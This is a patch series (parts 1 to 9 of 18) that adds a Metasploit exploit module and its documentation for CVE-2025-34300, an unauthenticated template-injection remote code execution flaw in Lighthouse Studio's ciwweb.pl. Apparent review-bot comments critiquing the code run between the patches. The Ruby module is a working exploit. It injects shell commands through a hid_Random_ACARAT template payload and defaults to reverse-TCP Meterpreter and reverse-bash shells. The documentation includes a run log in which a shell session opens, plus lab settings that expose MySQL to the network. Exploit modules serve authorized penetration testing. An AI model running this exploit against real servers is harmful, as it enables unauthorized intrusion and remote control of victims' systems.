From e7667d406ad6ac9d103b4ff35a4df6014eb4b333 Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Sun, 20 Jul 2025 15:23:38 +0400 Subject: [PATCH 01/18] Add Lighthouse Studio unauthenticated RCE (CVE-2025-34300) --- ...thouse_studio_unauth_rce_CVE_2025_34300.md | 382 ++++++++++++++++++ ...thouse_studio_unauth_rce_cve_2025_34300.rb | 178 ++++++++ 2 files changed, 560 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md create mode 100644 modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb diff --git a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md new file mode 100644 index 0000000000000..ff40e8dfa2c54 --- /dev/null +++ b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md 
@@ -0,0 +1,382 @@ +## Vulnerable Application + +This module exploits a template injection vulnerability in the +Sawtooth Software Lighthouse Studio's `ciwweb.pl` web application. +The application fails to properly sanitize user input within survey templates, +allowing unauthenticated attackers to inject and execute arbitrary Perl commands +on the target system. + +This vulnerability affects Lighthouse Studio versions prior to 9.16.14. +Successful exploitation may result in remote code execution under the privileges +of the web server, potentially exposing sensitive data or disrupting survey operations. + +An attacker can execute arbitrary system commands as the web server. + +## STUDYNAME parameter + +The `STUDYNAME` parameter must be set manually if the server responds with the error `Cannot find default studyname`, which occurs when the `hid_studyname` parameter is not provided. +The `hid_studyname` parameter serves as the identifier of the survey or test being executed. + +## Testing + +To set up a test environment: + +1. Download and Install Ubuntu 18.04.6 LTS + +Download the ISO from the official Ubuntu archive: +https://releases.ubuntu.com/18.04/ + +2. Update Package Index + +After installation, update your system’s package list: + +``` +sudo apt update +``` + +3. Install MySQL 5.7 + +Install MySQL 5.7, the target version: + +``` +sudo apt -y install mysql-server-5.7 +``` + +Once installed, MySQL should start automatically. If not, run: + +``` +sudo systemctl start mysql +``` + +4. Install Perl Modules + +Install core build tools and the cpanm Perl module manager: + +``` +sudo apt -y install build-essential cpanminus +``` + +Install required Perl modules with specific versions: + +``` +sudo cpanm DBI@1.642 +sudo cpanm DBD::mysql@4.050 +sudo cpanm JSON::PP@4.00 +sudo cpanm DateTime@1.06 +``` + +``` +sudo apt install libdbd-mysql-perl +``` + +5. 
Install and Start Apache Web Server + +``` +sudo apt install -y apache2 +sudo systemctl start apache2 +sudo systemctl enable apache2 +``` + +Apache will now be running and set to start automatically on boot. + +6. Enable CGI and Perl Support in Apache + +Install the required Apache modules and enable CGI execution: + +``` +sudo apt install -y libapache2-mod-perl2 +sudo a2enmod perl +sudo a2enmod cgi +sudo systemctl restart apache2 +``` + +This allows Perl CGI scripts to be executed from the web server. + +7. Install and Start FTP Server (vsftpd) + +``` +sudo apt install -y vsftpd +sudo systemctl start vsftpd +sudo systemctl enable vsftpd +``` + +8. Configure FTP Access + +Create FTP User + +``` +sudo adduser ftpuser +``` + +Set Directory Permissions + +``` +sudo chown -R ftpuser:ftpuser /var/www/html +``` + +Edit FTP Configuration. +Open the config file: + +``` +sudo nano /etc/vsftpd.conf +``` + +Update or add the following settings: + +``` +listen=YES +listen_ipv6=NO + +anonymous_enable=NO +local_enable=YES +write_enable=YES + +chroot_local_user=YES +allow_writeable_chroot=YES + +user_sub_token=$USER +local_root=/var/www/html + +local_umask=022 +file_open_mode=0644 +``` + +Then restart the FTP service: + +``` +sudo systemctl restart vsftpd +sudo systemctl enable vsftpd +``` + +9. 
Configure MySQL Access + +Create a Test User and Database + +Login to MySQL: + +``` +sudo mysql -u root +``` + +Then execute: + +``` +CREATE USER 'test'@'%' IDENTIFIED BY 'test'; +CREATE DATABASE test DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci; +GRANT ALL PRIVILEGES ON test.* TO 'test'@'%'; +FLUSH PRIVILEGES; +EXIT; +``` + +Allow External MySQL Connections + +Edit the MySQL config: + +``` +sudo nano /etc/mysql/mysql.conf.d/mysqld.cnf +` + +Find the line: + +``` +bind-address = 127.0.0.1 +``` + +Change it to: + +``` +bind-address = 0.0.0.0 +``` + +Save and exit, then allow MySQL traffic through the firewall: + +``` +sudo ufw allow 3306/tcp +``` + +Restart MySQL: + +``` +sudo systemctl restart mysql +``` + +10. Configure Apache for CGI Scripts + +Update Apache Virtual Host + +Edit the default site config: + +``` +sudo nano /etc/apache2/sites-enabled/000-default.conf +``` + +Inside the `` block, add: + +``` +ScriptAlias /cgi-bin/ /var/www/html/cgi-bin/ + + + AllowOverride None + Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch + Require all granted + +``` + +Restart Apache + +``` +sudo systemctl restart apache2 +``` + +Now CGI scripts in /var/www/html/cgi-bin/ should be executable. + +11. Download and Install Windows (on Second VM) + +Download Windows 10 ISO from the official Microsoft site: +https://www.microsoft.com/en-us/software-download/windows10 + +Follow standard installation steps in your hypervisor (e.g., VirtualBox, VMware, etc.). + +12. Download and Install Vulnerable Lighthouse Studio + +This is the vulnerable application used to build and upload surveys. + +https://d2rpjb6zne1wug.cloudfront.net/software-installers/Lighthouse-Studio/LighthouseStudio_9_16_12_Setup.exe + +The version history page is available at: +https://sawtoothsoftware.com/resources/software-downloads/lighthouse-studio/version-history + +Install Lighthouse Studio using default options. + +13. 
Create and Save a New Study + +Use + +``` +File -> New Study +``` + +and follow instructions. +In the end save the study. + +14. Upload the Study to the Ubuntu VM + +To host your survey on the Ubuntu VM: + +In the Top Bar -> Click on Hosting + +Set the following database configuration: + +Database Name: `test` + +Database Username: `test` + +Database Password: `test` + +Database Server: `MySQL` + +Set FTP Access + +Fill in the FTP settings: + +FTP Host: `IP address or hostname of your Ubuntu VM` + +Username: `ftpuser` + +Password: password for `ftpuser` + +In the "Advanced" Tab + +Set the Database Server Host Name — enter the IP address of your Ubuntu VM. + +15. Upload the Survey to Server + +Click the "Upload Survey to Server" button. + +If all configurations are correct, Lighthouse Studio will: + +- Upload the survey files via FTP +- Initialize the MySQL database +- Generate CGI scripts + +## Scenario + +``` +msf6 > use exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300 +[*] Using configured payload linux/x64/meterpreter/reverse_tcp +msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > show options + +Module options (exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
+ RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + RPORT 80 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + STUDYNAME no Value for the hid_studyname GET parameter + TARGETURI /cgi-bin/ciwweb.pl yes Path to vulnerable ciwweb.pl + URIPATH no The URI to use for this exploit (default is random) + VHOST no HTTP server virtual host + + + When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. + SRVPORT 8080 yes The local port to listen on. + + +Payload options (linux/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Linux Dropper + + + +View the full module info with the info, or info -d command. + +msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set RHOSTS 192.168.19.129 +RHOSTS => 192.168.19.129 +msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set STUDYNAME 123 +STUDYNAME => 123 +msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set LHOST eth0 +LHOST => 192.168.19.130 +msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set SRVPORT 9999 +SRVPORT => 9999 +msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > run + +[*] Started reverse TCP handler on 192.168.19.130:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Extracting version... 
+[*] Extracted version: 9.16.12 +[+] The target appears to be vulnerable. +[*] Uploading malicious payload... +[*] Command Stager progress - 44.31% done (362/817 bytes) +[*] Uploading malicious payload... +[*] Sending stage (3045380 bytes) to 192.168.19.129 +[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.129:39790) at 2025-07-20 07:04:31 -0400 +[*] Command Stager progress - 97.31% done (795/817 bytes) +[*] Uploading malicious payload... +[*] Command Stager progress - 100.00% done (817/817 bytes) + +meterpreter > sysinfo +Computer : 192.168.19.129 +OS : Ubuntu 18.04 (Linux 5.4.0-150-generic) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > + +``` \ No newline at end of file diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb new file mode 100644 index 0000000000000..2d74af65c2301 --- /dev/null +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb 
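Review bot: In the "Configure Apache for CGI Scripts" step of the documentation hunk, the snippet reads "Inside the `` block, add:" and then lists `AllowOverride None`, `Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch` and `Require all granted` with blank `+` lines around them; as rendered here the container name (presumably `<VirtualHost *:80>`) and the `<Directory ...>` / `</Directory>` lines are absent, and Apache will reject the directives without that wrapper, so please confirm the committed file carries them. In the MySQL step the closing fence after `sudo nano /etc/mysql/mysql.conf.d/mysqld.cnf` is a lone backtick. Since this page doubles as setup guidance, it is also worth one sentence stating that `bind-address = 0.0.0.0`, `ufw allow 3306/tcp`, `'test'@'%'` and `chown -R ftpuser:ftpuser /var/www/html` are lab-only settings that expose the database and the web root, not something to reproduce on a real host.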
@@ -0,0 +1,178 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "Template Injection Vulnerability in Sawtooth Software's Lighthouse Studio (CVE-2025-34300)", + 'Description' => %q{ + This module exploits a template injection vulnerability in the + Sawtooth Software Lighthouse Studio's `ciwweb.pl` web application. + The application fails to properly sanitize user input within survey templates, + allowing unauthenticated attackers to inject and execute arbitrary Perl commands + on the target system. + + This vulnerability affects Lighthouse Studio versions prior to 9.16.14. + Successful exploitation may result in remote code execution under the privileges + of the web server, potentially exposing sensitive data or disrupting survey operations. + + An attacker can execute arbitrary system commands as the web server. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Maksim Rogov', # Metasploit Module + 'Adam Kues' # Vulnerability Discovery + ], + 'References' => [ + ['CVE', 'CVE-2025-34300'], + ['URL', 'https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/'] + ], + 'Platform' => ['win', 'linux', 'unix'], + 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64], + 'Targets' => [ + [ + 'Linux Dropper', + { + 'Platform' => ['linux'], + 'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64], + 'Type' => :nix_dropper, + 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } + } + ], + [ + 'Linux Command', + { + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD], + 'Type' => :nix_command, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } + } + ], + [ + 'Windows Dropper', + { + 'Platform' => 'win', + 'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64], + 'Type' => :windows_dropper, + 'DefaultOptions' => { + 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' + } + } + ], + [ + 'Windows Command', + { + 'Platform' => 'win', + 'Arch' => [ARCH_CMD], + 'Type' => :windows_command, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' + } + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2025-07-16', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [REPEATABLE_SESSION] + } + ) + ) + + register_options( + [ + OptString.new('TARGETURI', [true, 'Path to vulnerable ciwweb.pl', '/cgi-bin/ciwweb.pl']), + OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']) + ] + ) + end + + def check + print_status('Extracting version...') + + vars = { + 'hid_javascript' => '1' + } + vars['hid_studyname'] = datastore['STUDYNAME'] if datastore['STUDYNAME'] + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path), + 'method' => 'GET', + 'vars_get' => vars + ) + + 
unless res.body =~ /Lighthouse Studio (\d+_\d+_\d+)/ + print_error("#{peer} - Unable to extract version number") + end + + version_match = Regexp.last_match(1).to_s + if !version_match.empty? + print_status("Extracted version: #{version_match.gsub('_', '.')}") + + version = Rex::Version.new(version_match.gsub('_', '')) + if version < Rex::Version.new(91614) + return CheckCode::Appears + else + return CheckCode::Safe + end + end + + html = res.get_html_document if res + if html.text.include?('Lighthouse Studio') + return CheckCode::Detected + end + + CheckCode::Unknown + end + + def execute_command(cmd, _opts = {}) + print_status('Uploading malicious payload...') + + cmd = Rex::Text.uri_encode(cmd, 'hex-all') + query = [ + 'hid_javascript=1', + "hid_Random_ACARAT=[%`#{cmd}`%]", + "hid_Random_ACARAT=#{Rex::Text.rand_text_alphanumeric(rand(3..5))}" + ].join('&') + + if datastore['STUDYNAME'] + query << "&hid_studyname=#{datastore['STUDYNAME']}" + end + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path), + 'method' => 'GET', + 'query' => query + }) + + if res + html = res.get_html_document + if html && html.text.include?('Sawtooth Error # 129') + return fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid') + end + end + end + + def exploit + @linemax = 450 + + case target['Type'] + when :windows_dropper, :nix_dropper + execute_cmdstager(linemax: @linemax) + when :windows_command, :nix_command + execute_command(payload.encoded, linemax: @linemax) + end + end +end From 75e1158457f05e041932615816d17343122f5ed0 Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 03:16:40 +0400 Subject: [PATCH 02/18] Fixed docs formatting --- .../multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
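Review bot: `check` dereferences `res.body` before testing whether `res` is nil, so a host that does not answer raises `NoMethodError` instead of returning `CheckCode::Unknown`; guard with `return CheckCode::Unknown unless res` first. The version test `Rex::Version.new(version_match.gsub('_', ''))` against `Rex::Version.new(91614)` compares the concatenated digits as one number, so `9.16.9` becomes `9169` and `10.1.1` becomes `1011`, both "less than" `91614`; build the version with dots instead (`Rex::Version.new(version_match.gsub('_', '.')) < Rex::Version.new('9.16.14')`). In `execute_command`, `if datastore['STUDYNAME']` is always true for an `OptString` whose default is `''`, so an empty `hid_studyname=` is appended on every request, and the value is concatenated into `query` without `Rex::Text.uri_encode` while `cmd` is encoded `hex-all`. The failure string the module looks for, `Sawtooth Error # 129`, also differs from the `Cannot find default studyname` message the documentation tells the operator to watch for; pick one and use it in both places. `return fail_with(...)` is redundant, since `fail_with` raises.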
diff --git a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md index ff40e8dfa2c54..10d7f1b23250a 100644 --- a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md +++ b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md @@ -174,7 +174,7 @@ Edit the MySQL config: ``` sudo nano /etc/mysql/mysql.conf.d/mysqld.cnf -` +``` Find the line: From a836c9bc5e6d0df2e86cd08396a1fe82c941a983 Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 03:17:57 +0400 Subject: [PATCH 03/18] Fixed CVE Format --- .../multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 2d74af65c2301..477fb31f22b8e 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -34,7 +34,7 @@ def initialize(info = {}) 'Adam Kues' # Vulnerability Discovery ], 'References' => [ - ['CVE', 'CVE-2025-34300'], + ['CVE', '2025-34300'], ['URL', 'https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/'] ], 'Platform' => ['win', 'linux', 'unix'], From 6bf385e17aa850675384c6ffe8398cf3eb70ecef Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 03:20:34 +0400 Subject: [PATCH 04/18] Removed duplicate logging bug --- .../http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) 
diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 477fb31f22b8e..3afc447c78c78 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -138,8 +138,6 @@ def check end def execute_command(cmd, _opts = {}) - print_status('Uploading malicious payload...') - cmd = Rex::Text.uri_encode(cmd, 'hex-all') query = [ 'hid_javascript=1', @@ -166,8 +164,9 @@ def execute_command(cmd, _opts = {}) end def exploit - @linemax = 450 + print_status('Uploading malicious payload...') + @linemax = 450 case target['Type'] when :windows_dropper, :nix_dropper execute_cmdstager(linemax: @linemax) From 45a6176a9cc8dcc6987a70e97935f82a0a3a8bac Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 11:03:24 +0400 Subject: [PATCH 05/18] Removed Limits --- .../http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 3afc447c78c78..7df7f2e6de258 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -166,12 +166,11 @@ def execute_command(cmd, _opts = {}) def exploit print_status('Uploading malicious payload...') - @linemax = 450 case target['Type'] when :windows_dropper, :nix_dropper - execute_cmdstager(linemax: @linemax) + execute_cmdstager when :windows_command, :nix_command - execute_command(payload.encoded, linemax: @linemax) + execute_command(payload.encoded) end end end From c06a7c477bf58da7107c82d561a254f1fb6a1a3d Mon Sep 17 00:00:00 2001 
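Review bot: Dropping `linemax` in the `exploit` hunk of PATCH 05 leaves the cmdstager on its default chunk size, but every chunk still travels in a GET query string (`'method' => 'GET'`, `'query' => query`), so the real ceiling is the server's request-line limit (Apache's default `LimitRequestLine` is 8190 bytes), which the module no longer accounts for. Either keep an explicit `linemax` that fits comfortably under that limit once `hex-all` encoding has tripled the command, or add a comment recording the assumption so the next person who lengthens the command or switches flavors knows where the boundary is.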
From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 13:06:51 +0400 Subject: [PATCH 06/18] Check Method Refactoring --- ...thouse_studio_unauth_rce_cve_2025_34300.rb | 25 ++++++++----------- 1 file changed, 10 insertions(+), 15 deletions(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 7df7f2e6de258..f626cb00ca467 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -112,29 +112,24 @@ def check 'method' => 'GET', 'vars_get' => vars ) + return CheckCode::Unknown('No response from target') unless res - unless res.body =~ /Lighthouse Studio (\d+_\d+_\d+)/ - print_error("#{peer} - Unable to extract version number") - end - - version_match = Regexp.last_match(1).to_s - if !version_match.empty? + if res.body =~ /Lighthouse Studio (\d+_\d+_\d+)/ + version_match = Regexp.last_match(1).to_s print_status("Extracted version: #{version_match.gsub('_', '.')}") - version = Rex::Version.new(version_match.gsub('_', '')) - if version < Rex::Version.new(91614) - return CheckCode::Appears - else - return CheckCode::Safe - end + + return CheckCode::Appears if version < Rex::Version.new(91614) + else + print_error("#{peer} - Unable to extract version number") end - html = res.get_html_document if res - if html.text.include?('Lighthouse Studio') + html = res.get_html_document + if html&.text&.include?('Lighthouse Studio') return CheckCode::Detected end - CheckCode::Unknown + CheckCode::Safe end def execute_command(cmd, _opts = {}) From e90396a15fadfa05182a7f7c858aab84d6afc8be Mon Sep 17 00:00:00 2001 
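Review bot: The refactored `check` in PATCH 06 mis-reports patched hosts: when the version is extracted and is 9.16.14 or later the `if` branch simply does not return, control drops to `html&.text&.include?('Lighthouse Studio')`, and since the page that matched `Lighthouse Studio (\d+_\d+_\d+)` necessarily contains that text, a fixed host comes back as `Detected` rather than `Safe`. Conversely, when neither the regex nor the HTML text matches, the method now ends in `CheckCode::Safe`, which asserts the host is not vulnerable on no evidence; that final return should be `CheckCode::Unknown`. Suggest `return CheckCode::Safe("Version #{version} is patched")` right after the `Appears` line and `CheckCode::Unknown` at the bottom.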
From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 13:59:43 +0400 Subject: [PATCH 07/18] Execute Method Refactoring --- ...thouse_studio_unauth_rce_cve_2025_34300.rb | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index f626cb00ca467..730fdf6884383 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -134,27 +134,27 @@ def check def execute_command(cmd, _opts = {}) cmd = Rex::Text.uri_encode(cmd, 'hex-all') + query = [ 'hid_javascript=1', "hid_Random_ACARAT=[%`#{cmd}`%]", "hid_Random_ACARAT=#{Rex::Text.rand_text_alphanumeric(rand(3..5))}" - ].join('&') + ] - if datastore['STUDYNAME'] - query << "&hid_studyname=#{datastore['STUDYNAME']}" - end + query << "hid_studyname=#{datastore['STUDYNAME']}" unless datastore['STUDYNAME'].to_s.strip.empty? + query_string = query.join('&') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => 'GET', - 'query' => query + 'query' => query_string }) - if res - html = res.get_html_document - if html && html.text.include?('Sawtooth Error # 129') - return fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid') - end + fail_with(Failure::Unreachable, 'No response from target') unless res + + html = res.get_html_document + if html&.text&.include?('Sawtooth Error # 129') + fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid') end end From 85e97aaaf59b320852aa1f4522a58a6916a83dc8 Mon Sep 17 00:00:00 2001 
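Review bot: `query << "hid_studyname=#{datastore['STUDYNAME']}"` still concatenates the study name raw while `cmd` goes through `Rex::Text.uri_encode`; a value containing `&`, `=`, `#` or a space will be split or truncated by the server. Encode it with `Rex::Text.uri_encode(datastore['STUDYNAME'])` before appending. Please also add a comment explaining why `hid_Random_ACARAT` is sent twice, once carrying the `[%`...`%]` template payload and once with a random 3-5 character value; nothing in the hunk says what the second copy achieves, and a maintainer cannot tell whether it is load-bearing or leftover.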
From: Maksim Rogov <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 13:14:19 +0300 Subject: [PATCH 08/18] Fix STUDYNAME empty check --- .../multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 730fdf6884383..4d4a2b2d6206e 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -105,7 +105,7 @@ def check vars = { 'hid_javascript' => '1' } - vars['hid_studyname'] = datastore['STUDYNAME'] if datastore['STUDYNAME'] + vars['hid_studyname'] = datastore['STUDYNAME'] unless datastore['STUDYNAME'].to_s.strip.empty? res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), From 6276b27dfca4bf86f41a876f74755f412b477f37 Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 21:34:01 +0400 Subject: [PATCH 09/18] Improved Exploit Stability on Windows --- ...thouse_studio_unauth_rce_cve_2025_34300.rb | 25 +++++++++++-------- 1 file changed, 14 insertions(+), 11 deletions(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 4d4a2b2d6206e..2404780117444 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -94,7 +94,7 @@ def initialize(info = {}) register_options( [ OptString.new('TARGETURI', [true, 'Path to vulnerable ciwweb.pl', '/cgi-bin/ciwweb.pl']), - OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']) + OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']), ] ) end 
@@ -105,7 +105,7 @@ def check vars = { 'hid_javascript' => '1' } - vars['hid_studyname'] = datastore['STUDYNAME'] unless datastore['STUDYNAME'].to_s.strip.empty? + vars['hid_studyname'] = datastore['STUDYNAME'] unless datastore['STUDYNAME'].strip.empty? res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), @@ -133,7 +133,7 @@ def check end def execute_command(cmd, _opts = {}) - cmd = Rex::Text.uri_encode(cmd, 'hex-all') + cmd = Rex::Text.uri_encode(cmd).gsub('\\', '%5C').gsub('/', '%2F') query = [ 'hid_javascript=1', @@ -141,8 +141,9 @@ def execute_command(cmd, _opts = {}) "hid_Random_ACARAT=#{Rex::Text.rand_text_alphanumeric(rand(3..5))}" ] - query << "hid_studyname=#{datastore['STUDYNAME']}" unless datastore['STUDYNAME'].to_s.strip.empty? + query << "hid_studyname=#{datastore['STUDYNAME']}" unless datastore['STUDYNAME'].strip.empty? query_string = query.join('&') + print_status(query_string) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), @@ -150,11 +151,11 @@ def execute_command(cmd, _opts = {}) 'query' => query_string }) - fail_with(Failure::Unreachable, 'No response from target') unless res - - html = res.get_html_document - if html&.text&.include?('Sawtooth Error # 129') - fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid') + if res + html = res.get_html_document + if html&.text&.include?('Cannot find default studyname') + fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid') + end end end @@ -162,10 +163,12 @@ def exploit print_status('Uploading malicious payload...') case target['Type'] - when :windows_dropper, :nix_dropper + when :windows_dropper + execute_cmdstager(temp: '.') + when :nix_dropper execute_cmdstager when :windows_command, :nix_command execute_command(payload.encoded) end end -end +end \ No newline at end of file From d57a36413d8c9d3f61aed75668a70f0fac7d2e1f Mon Sep 17 00:00:00 2001 
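Review bot: `print_status(query_string)` in the `execute_command` hunk dumps the full encoded payload to the console for every cmdstager chunk; remove it or make it `vprint_status`. The same hunk replaces `fail_with(Failure::Unreachable, 'No response from target')` with a bare `if res`, so a host that stops answering mid-upload no longer aborts the stager and the loop runs to completion with nothing delivered; keep the `fail_with` on a nil response. `datastore['STUDYNAME'].strip` drops the `.to_s` guard added one patch earlier. The encoding change, `Rex::Text.uri_encode(cmd)` in its default mode plus explicit `%5C`/`%2F` for `\` and `/`, is presumably what "Improved Exploit Stability on Windows" refers to, but nothing in the diff says why `hex-all` failed; a one-line comment would stop it being reverted. Finally, `execute_cmdstager(temp: '.')` writes the stager file into the CGI script's working directory on Windows, which should be reflected with `ARTIFACTS_ON_DISK` in `SideEffects` and a mention in the docs.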
